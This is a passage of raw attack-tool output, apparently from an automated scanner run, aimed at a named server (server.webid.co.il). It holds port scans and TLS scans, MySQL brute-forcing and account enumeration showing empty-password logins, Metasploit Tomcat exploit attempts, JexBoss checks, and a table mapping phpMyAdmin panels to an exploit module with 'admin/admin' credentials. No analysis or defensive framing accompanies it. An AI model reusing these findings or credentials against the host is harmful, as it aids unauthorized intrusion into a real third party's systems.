  3416. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3417. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3418. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3419. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3420. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  3421. Accepted TLSv1.1 128 bits AES128-SHA
  3422. Accepted TLSv1.1 256 bits AES256-SHA
  3423. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  3424. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  3425. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  3426. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  3427. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  3428. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3429. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3430. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3431. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3432. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  3433. Accepted TLSv1.0 128 bits AES128-SHA
  3434. Accepted TLSv1.0 256 bits AES256-SHA
  3435. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  3436. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  3437. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  3438. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  3439. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  3440.  
  3441. SSL Certificate:
  3442. Signature Algorithm: sha1WithRSAEncryption
  3443. RSA Key Strength: 2048
  3444.  
  3445. Subject: localhost
  3446. Issuer: localhost
  3447.  
  3448. Not valid before: Sep 20 10:18:07 2014 GMT
  3449. Not valid after: Feb 4 10:18:07 2042 GMT
  3450. #######################################################################################################################################
  3451. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:32 EST
  3452. NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
  3453. NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
  3454. NSE: [mysql-brute] passwords: Time limit 10m00s exceeded.
  3455. Nmap scan report for server.webid.co.il (62.90.134.182)
  3456. Host is up (0.23s latency).
  3457.  
  3458. PORT STATE SERVICE VERSION
  3459. 3306/tcp open mysql MySQL 5.5.60-MariaDB
  3460. | mysql-brute:
  3461. | Accounts: No valid accounts found
  3462. |_ Statistics: Performed 15790 guesses in 600 seconds, average tps: 26.1
  3463. | mysql-enum:
  3464. | Valid usernames:
  3465. | root:<empty> - Valid credentials
  3466. | netadmin:<empty> - Valid credentials
  3467. | guest:<empty> - Valid credentials
  3468. | user:<empty> - Valid credentials
  3469. | web:<empty> - Valid credentials
  3470. | sysadmin:<empty> - Valid credentials
  3471. | administrator:<empty> - Valid credentials
  3472. | webadmin:<empty> - Valid credentials
  3473. | admin:<empty> - Valid credentials
  3474. | test:<empty> - Valid credentials
  3475. |_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
  3476. | mysql-info:
  3477. | Protocol: 10
  3478. | Version: 5.5.60-MariaDB
  3479. | Thread ID: 11633341
  3480. | Capabilities flags: 63487
  3481. | Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, SupportsTransactions, Support41Auth, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, ODBCClient, InteractiveClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsCompression, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
  3482. | Status: Autocommit
  3483. | Salt: 5(dB[$?Q[SmLrz.t}8=g
  3484. |_ Auth Plugin Name: mysql_native_password
  3485. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3486. Device type: general purpose|firewall|storage-misc|VoIP phone
  3487. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  3488. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  3489. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  3490. No exact OS matches for host (test conditions non-ideal).
  3491. Network Distance: 17 hops
  3492.  
  3493. TRACEROUTE (using port 3306/tcp)
  3494. HOP RTT ADDRESS
  3495. 1 144.42 ms 10.246.200.1
  3496. 2 144.46 ms 193.9.115.113
  3497. 3 144.47 ms 176.10.83.34
  3498. 4 144.60 ms sfia-b2-link.telia.net (62.115.148.144)
  3499. 5 176.40 ms prag-bb1-link.telia.net (80.91.253.248)
  3500. 6 176.64 ms ffm-bb3-link.telia.net (62.115.121.118)
  3501. 7 176.44 ms ffm-b1-link.telia.net (62.115.116.164)
  3502. 8 177.49 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  3503. 9 ...
  3504. 10 230.94 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3505. 11 233.07 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3506. 12 234.80 ms core1-0-1-0-1-gw2.hfa.nv.net.il (212.143.7.22)
  3507. 13 233.09 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
  3508. 14 233.07 ms 82.166.37.254
  3509. 15 236.67 ms 82.166.37.254
  3510. 16 237.22 ms 62-90-134-178.barak.net.il (62.90.134.178)
  3511. 17 233.68 ms server.webid.co.il (62.90.134.182)
  3512. #######################################################################################################################################
  3513. + -- --=[Port 6000 closed... skipping.
  3514. + -- --=[Port 6667 closed... skipping.
  3515. + -- --=[Port 7001 closed... skipping.
  3516. + -- --=[Port 8000 closed... skipping.
  3517. + -- --=[Port 8100 closed... skipping.
  3518. + -- --=[Port 8080 opened... running tests...
  3519.  
  3520. ^ ^
  3521. _ __ _ ____ _ __ _ _ ____
  3522. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3523. | V V // o // _/ | V V // 0 // 0 // _/
  3524. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  3525. <
  3526. ...'
  3527.  
  3528. WAFW00F - Web Application Firewall Detection Tool
  3529.  
  3530. By Sandro Gauci && Wendel G. Henrique
  3531.  
  3532. Checking http://62.90.134.182:8080
  3533. Generic Detection results:
  3534. No WAF detected by the generic detection
  3535. Number of requests: 14
  3536.  
  3537.  
  3538. Version: 1.11.12-static
  3539. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3540.  
  3541. Connected to 62.90.134.182
  3542.  
  3543. Testing SSL server 62.90.134.182 on port 8080 using SNI name 62.90.134.182
  3544.  
  3545. TLS Fallback SCSV:
  3546. Server does not support TLS Fallback SCSV
  3547.  
  3548. TLS renegotiation:
  3549. Session renegotiation not supported
  3550.  
  3551. TLS Compression:
  3552. Compression disabled
  3553.  
  3554. Heartbleed:
  3555. TLS 1.2 not vulnerable to heartbleed
  3556. TLS 1.1 not vulnerable to heartbleed
  3557. TLS 1.0 not vulnerable to heartbleed
  3558.  
  3559. Supported Server Cipher(s):
  3560. #######################################################################################################################################
  3561. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:52 EST
  3562. Nmap scan report for server.webid.co.il (62.90.134.182)
  3563. Host is up (0.23s latency).
  3564.  
  3565. PORT STATE SERVICE VERSION
  3566. 8080/tcp open ssl/http-proxy Apache/2
  3567. |_http-server-header: Apache/2
  3568. |_http-vuln-cve2017-5638: ERROR: Script execution failed (use -d to debug)
  3569. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3570. Device type: general purpose|storage-misc|firewall|VoIP phone
  3571. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
  3572. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
  3573. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.39 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  3574. No exact OS matches for host (test conditions non-ideal).
  3575. Network Distance: 16 hops
  3576.  
  3577. TRACEROUTE (using port 8080/tcp)
  3578. HOP RTT ADDRESS
  3579. 1 145.20 ms 10.246.200.1
  3580. 2 145.27 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  3581. 3 145.26 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
  3582. 4 147.46 ms sfia-b2-link.telia.net (62.115.148.144)
  3583. 5 178.66 ms 62.115.119.72
  3584. 6 177.40 ms ffm-bb4-link.telia.net (62.115.133.79)
  3585. 7 176.95 ms ffm-b1-link.telia.net (62.115.137.165)
  3586. 8 178.67 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  3587. 9 ...
  3588. 10 232.57 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3589. 11 234.02 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3590. 12 233.95 ms 212.143.7.43
  3591. 13 235.92 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
  3592. 14 235.89 ms 82.166.37.254
  3593. 15 235.81 ms 62-90-134-178.barak.net.il (62.90.134.178)
  3594. 16 235.76 ms server.webid.co.il (62.90.134.182)
  3595. #######################################################################################################################################
  3596. RHOSTS => 62.90.134.182
  3597. RHOST => 62.90.134.182
  3598. [-] WAR file not found
  3599. [*] Auxiliary module execution completed
  3600. [*] Scanned 1 of 1 hosts (100% complete)
  3601. [*] Auxiliary module execution completed
  3602. RPORT => 8080
  3603. [*] Scanned 1 of 1 hosts (100% complete)
  3604. [*] Auxiliary module execution completed
  3605. [*] Attempting to connect to 62.90.134.182:8080
  3606. [+] No File(s) found
  3607. [*] Scanned 1 of 1 hosts (100% complete)
  3608. [*] Auxiliary module execution completed
  3609. [*] http://62.90.134.182:8080/admin/j_security_check - Checking j_security_check...
  3610. [*] http://62.90.134.182:8080/admin/j_security_check - Server returned: 404
  3611. [-] http://62.90.134.182:8080/admin/j_security_check - Unable to enumerate users with this URI
  3612. [*] Scanned 1 of 1 hosts (100% complete)
  3613. [*] Auxiliary module execution completed
  3614. [-] http://62.90.134.182:8080 - Authorization not requested
  3615. [*] Scanned 1 of 1 hosts (100% complete)
  3616. [*] Auxiliary module execution completed
  3617. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  3618. [*] Exploit completed, but no session was created.
  3619. USERNAME => tomcat
  3620. PASSWORD => tomcat
  3621. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  3622. [*] Exploit completed, but no session was created.
  3623. #######################################################################################################################################
  3624.  
  3625.  
  3626.  
  3627. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  3628. | * And others Java Deserialization Vulnerabilities * |
  3629. | |
  3630. | @author: João Filho Matos Figueiredo |
  3631. | @contact: joaomatosf@gmail.com |
  3632. | |
  3633. | @update: https://github.com/joaomatosf/jexboss |
  3634. #______________________________________________________#
  3635.  
  3636. @version: 1.2.4
  3637.  
  3638. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  3639.  
  3640.  
  3641. ** Checking Host: http://62.90.134.182:8080 **
  3642.  
  3643. [*] Checking admin-console: [ OK ]
  3644. [*] Checking Struts2: [ OK ]
  3645. [*] Checking Servlet Deserialization: [ OK ]
  3646. [*] Checking Application Deserialization: [ OK ]
  3647. [*] Checking Jenkins: [ OK ]
  3648. [*] Checking web-console: [ OK ]
  3649. [*] Checking jmx-console: [ OK ]
  3650. [*] Checking JMXInvokerServlet: [ OK ]
  3651.  
  3652.  
  3653. * Results:
  3654. The server is not vulnerable to bugs tested ... :D
  3655.  
  3656. * Info: review, suggestions, updates, etc:
  3657. https://github.com/joaomatosf/jexboss
  3658.  
  3659. * DONATE: Please consider making a donation to help improve this tool,
  3660. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
  3661. #######################################################################################################################################
  3662. +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
  3663. | App Name | URL to Application | Potential Exploit | Username | Password |
  3664. +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
  3665. | phpMyAdmin | https://62.90.134.182:8081/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
  3666. | phpMyAdmin | https://62.90.134.182:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | admin | admin |
  3667. +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
  3668. #######################################################################################################################################
  3669. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:59 EST
  3670. NSE: Loaded 149 scripts for scanning.
  3671. NSE: Script Pre-scanning.
  3672. NSE: Starting runlevel 1 (of 3) scan.
  3673. Initiating NSE at 04:59
  3674. Completed NSE at 04:59, 0.00s elapsed
  3675. NSE: Starting runlevel 2 (of 3) scan.
  3676. Initiating NSE at 04:59
  3677. Completed NSE at 04:59, 0.00s elapsed
  3678. NSE: Starting runlevel 3 (of 3) scan.
  3679. Initiating NSE at 04:59
  3680. Completed NSE at 04:59, 0.00s elapsed
  3681. Initiating Ping Scan at 04:59
  3682. Scanning 62.90.134.182 [4 ports]
  3683. Completed Ping Scan at 04:59, 0.27s elapsed (1 total hosts)
  3684. Initiating Parallel DNS resolution of 1 host. at 04:59
  3685. Completed Parallel DNS resolution of 1 host. at 04:59, 0.02s elapsed
  3686. Initiating Connect Scan at 04:59
  3687. Scanning server.webid.co.il (62.90.134.182) [1000 ports]
  3688. Discovered open port 3306/tcp on 62.90.134.182
  3689. Discovered open port 80/tcp on 62.90.134.182
  3690. Discovered open port 53/tcp on 62.90.134.182
  3691. Discovered open port 995/tcp on 62.90.134.182
  3692. Discovered open port 993/tcp on 62.90.134.182
  3693. Discovered open port 21/tcp on 62.90.134.182
  3694. Discovered open port 443/tcp on 62.90.134.182
  3695. Discovered open port 110/tcp on 62.90.134.182
  3696. Discovered open port 143/tcp on 62.90.134.182
  3697. Discovered open port 587/tcp on 62.90.134.182
  3698. Discovered open port 8080/tcp on 62.90.134.182
  3699. Discovered open port 5060/tcp on 62.90.134.182
  3700. Discovered open port 8081/tcp on 62.90.134.182
  3701. Discovered open port 465/tcp on 62.90.134.182
  3702. Discovered open port 2000/tcp on 62.90.134.182
  3703. Discovered open port 2222/tcp on 62.90.134.182
  3704. Completed Connect Scan at 04:59, 11.65s elapsed (1000 total ports)
  3705. Initiating Service scan at 04:59
  3706. Scanning 16 services on server.webid.co.il (62.90.134.182)
  3707. Completed Service scan at 05:00, 21.13s elapsed (16 services on 1 host)
  3708. Initiating OS detection (try #1) against server.webid.co.il (62.90.134.182)
  3709. Retrying OS detection (try #2) against server.webid.co.il (62.90.134.182)
  3710. adjust_timeouts2: packet supposedly had rtt of -503282 microseconds. Ignoring time.
  3711. adjust_timeouts2: packet supposedly had rtt of -503282 microseconds. Ignoring time.
  3712. Initiating Traceroute at 05:00
  3713. Completed Traceroute at 05:00, 3.03s elapsed
  3714. Initiating Parallel DNS resolution of 15 hosts. at 05:00
  3715. Completed Parallel DNS resolution of 15 hosts. at 05:00, 16.51s elapsed
  3716. NSE: Script scanning 62.90.134.182.
  3717. NSE: Starting runlevel 1 (of 3) scan.
  3718. Initiating NSE at 05:00
  3719. NSE Timing: About 99.90% done; ETC: 05:01 (0:00:00 remaining)
  3720. Completed NSE at 05:01, 33.12s elapsed
  3721. NSE: Starting runlevel 2 (of 3) scan.
  3722. Initiating NSE at 05:01
  3723. NSE Timing: About 90.62% done; ETC: 05:01 (0:00:03 remaining)
  3724. NSE Timing: About 91.41% done; ETC: 05:02 (0:00:06 remaining)
  3725. NSE Timing: About 92.19% done; ETC: 05:02 (0:00:08 remaining)
  3726. NSE Timing: About 92.97% done; ETC: 05:03 (0:00:09 remaining)
  3727. NSE Timing: About 94.53% done; ETC: 05:03 (0:00:09 remaining)
  3728. NSE Timing: About 99.22% done; ETC: 05:04 (0:00:01 remaining)
  3729. Completed NSE at 05:04, 207.31s elapsed
  3730. NSE: Starting runlevel 3 (of 3) scan.
  3731. Initiating NSE at 05:04
  3732. Completed NSE at 05:04, 0.00s elapsed
  3733. Nmap scan report for server.webid.co.il (62.90.134.182)
  3734. Host is up, received echo-reply ttl 47 (0.17s latency).
  3735. Scanned at 2019-01-23 04:59:37 EST for 302s
  3736. Not shown: 797 closed ports, 187 filtered ports
  3737. Reason: 797 conn-refused and 187 no-responses
  3738. PORT STATE SERVICE REASON VERSION
  3739. 21/tcp open ftp syn-ack ProFTPD
  3740. |_ssl-date: TLS randomness does not represent time
  3741. | tls-alpn:
  3742. |_ ftp
  3743. | tls-nextprotoneg:
  3744. |_ ftp
  3745. 53/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
  3746. | dns-nsid:
  3747. |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
  3748. 80/tcp open http syn-ack nginx
  3749. | http-methods:
  3750. |_ Supported Methods: GET HEAD POST
  3751. |_http-server-header: nginx
  3752. |_http-title: Site doesn't have a title (text/html).
  3753. 110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
  3754. |_pop3-capabilities: AUTH-RESP-CODE USER PIPELINING CAPA SASL(PLAIN) UIDL TOP STLS RESP-CODES
  3755. |_ssl-date: TLS randomness does not represent time
  3756. 143/tcp open imap syn-ack Dovecot imapd
  3757. |_imap-capabilities: OK ID more have listed capabilities post-login LITERAL+ Pre-login IMAP4rev1 STARTTLS IDLE LOGIN-REFERRALS SASL-IR ENABLE AUTH=PLAINA0001
  3758. |_ssl-date: TLS randomness does not represent time
  3759. 443/tcp open ssl/http syn-ack nginx
  3760. | http-methods:
  3761. |_ Supported Methods: GET HEAD POST
  3762. |_http-server-header: nginx
  3763. |_http-title: Site doesn't have a title (text/html).
  3764. | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
  3765. | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
  3766. | Public Key type: rsa
  3767. | Public Key bits: 2048
  3768. | Signature Algorithm: sha1WithRSAEncryption
  3769. | Not valid before: 2014-09-20T10:18:07
  3770. | Not valid after: 2042-02-04T10:18:07
  3771. | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
  3772. | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
  3773. | -----BEGIN CERTIFICATE-----
  3774. | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
  3775. | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
  3776. | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
  3777. | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
  3778. | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
  3779. | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
  3780. | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
  3781. | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
  3782. | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
  3783. | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
  3784. | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
  3785. | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
  3786. | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
  3787. | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
  3788. | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
  3789. | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
  3790. | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
  3791. | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
  3792. | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
  3793. | Mkh66D1gfgB2ubts
  3794. |_-----END CERTIFICATE-----
  3795. |_ssl-date: TLS randomness does not represent time
  3796. | tls-alpn:
  3797. | h2
  3798. |_ http/1.1
  3799. | tls-nextprotoneg:
  3800. | h2
  3801. |_ http/1.1
  3802. 465/tcp open ssl/smtp syn-ack Exim smtpd 4.91
  3803. |_smtp-commands: Couldn't establish connection on port 465
  3804. | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/localityName=Sometown/emailAddress=webaster@localhost/organizationalUnitName=none
  3805. | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/localityName=Sometown/emailAddress=webaster@localhost/organizationalUnitName=none
  3806. | Public Key type: rsa
  3807. | Public Key bits: 1024
  3808. | Signature Algorithm: sha1WithRSAEncryption
  3809. | Not valid before: 2014-07-29T06:26:14
  3810. | Not valid after: 2041-12-13T06:26:14
  3811. | MD5: 4b29 2c8a 525a d420 e4f7 78c1 45d2 4ed9
  3812. | SHA-1: cc0a 349f 83d9 4d41 d316 0e7a a751 ce8d 5322 7241
  3813. | -----BEGIN CERTIFICATE-----
  3814. | MIICkTCCAfoCCQD3JF1s3Ui7BzANBgkqhkiG9w0BAQUFADCBjDELMAkGA1UEBhMC
  3815. | R0IxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
  3816. | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEh
  3817. | MB8GCSqGSIb3DQEJARYSd2ViYXN0ZXJAbG9jYWxob3N0MB4XDTE0MDcyOTA2MjYx
  3818. | NFoXDTQxMTIxMzA2MjYxNFowgYwxCzAJBgNVBAYTAkdCMRUwEwYDVQQIEwxTb21l
  3819. | cHJvdmluY2UxETAPBgNVBAcTCFNvbWV0b3duMQ0wCwYDVQQKEwRub25lMQ0wCwYD
  3820. | VQQLEwRub25lMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEndl
  3821. | YmFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5Euc
  3822. | SYOuqLn4h5hktsteODz8pR6VsFNktHT+tgSHoEPeJ/2S1efAY/zoMRhwXo9k9RVc
  3823. | S11EDYVjzGrQeni2/o0rFC3kCJI37P4AHbaQg7BJlyqVW9BHQaHW++gknGH8L2XF
  3824. | DC97iiawhWQIEF06Hg8319FHZZBdTEi3w5A0R10CAwEAATANBgkqhkiG9w0BAQUF
  3825. | AAOBgQBT5tKhGxu0mGTfi9dP8q21FSzhyR9G5n7uGL/+3Bl7Six7w9l+4HOy3zMl
  3826. | VvJTXWh+FGInAytzBf4BzC3D84qo13B8w13tivpdNf1o1WV65fgBZZTmak/KCbZf
  3827. | 9BHpO92XZPxlmPCEPoMmyXN0dVM8jZmbI6LvFZZS1EBIPx9fng==
  3828. |_-----END CERTIFICATE-----
  3829. |_ssl-date: TLS randomness does not represent time
  3830. 587/tcp open smtp syn-ack Exim smtpd 4.91
  3831. |_smtp-commands: SMTP: EHLO 550 Bad HELO - Host impersonating hostname [server.webid.co.il]\x0D
  3832. 993/tcp open ssl/imaps? syn-ack
  3833. |_ssl-date: TLS randomness does not represent time
  3834. 995/tcp open ssl/pop3s? syn-ack
  3835. |_ssl-date: TLS randomness does not represent time
  3836. 2000/tcp open tcpwrapped syn-ack
  3837. 2222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to webid.co.il)
  3838. |_http-favicon: Unknown favicon MD5: F0CC6DDDAE553AA7CFEB2CA5B62B2083
  3839. | http-methods:
  3840. |_ Supported Methods: GET HEAD POST
  3841. |_http-server-header: DirectAdmin Daemon v1.53.0 Registered to webid.co.il
  3842. |_http-title: DirectAdmin Login
  3843. |_http-trane-info: Problem with XML parsing of /evox/about
  3844. 3306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
  3845. | mysql-info:
  3846. | Protocol: 10
  3847. | Version: 5.5.60-MariaDB
  3848. | Thread ID: 11690366
  3849. | Capabilities flags: 63487
  3850. | Some Capabilities: Support41Auth, SupportsLoadDataLocal, LongPassword, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, ODBCClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, FoundRows, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
  3851. | Status: Autocommit
  3852. | Salt: >|w^Tf(/U?ygxE-S8^R_
  3853. |_ Auth Plugin Name: mysql_native_password
  3854. 5060/tcp open tcpwrapped syn-ack
  3855. 8080/tcp open ssl/http-proxy syn-ack Apache/2
  3856. | http-methods:
  3857. |_ Supported Methods: GET POST OPTIONS HEAD
  3858. |_http-open-proxy: Proxy might be redirecting requests
  3859. |_http-server-header: Apache/2
  3860. |_http-title: Site doesn't have a title (text/html).
  3861. 8081/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
  3862. | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
  3863. | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
  3864. | Public Key type: rsa
  3865. | Public Key bits: 2048
  3866. | Signature Algorithm: sha1WithRSAEncryption
  3867. | Not valid before: 2014-09-20T10:18:07
  3868. | Not valid after: 2042-02-04T10:18:07
  3869. | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
  3870. | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
  3871. | -----BEGIN CERTIFICATE-----
  3872. | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
  3873. | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
  3874. | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
  3875. | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
  3876. | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
  3877. | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
  3878. | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
  3879. | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
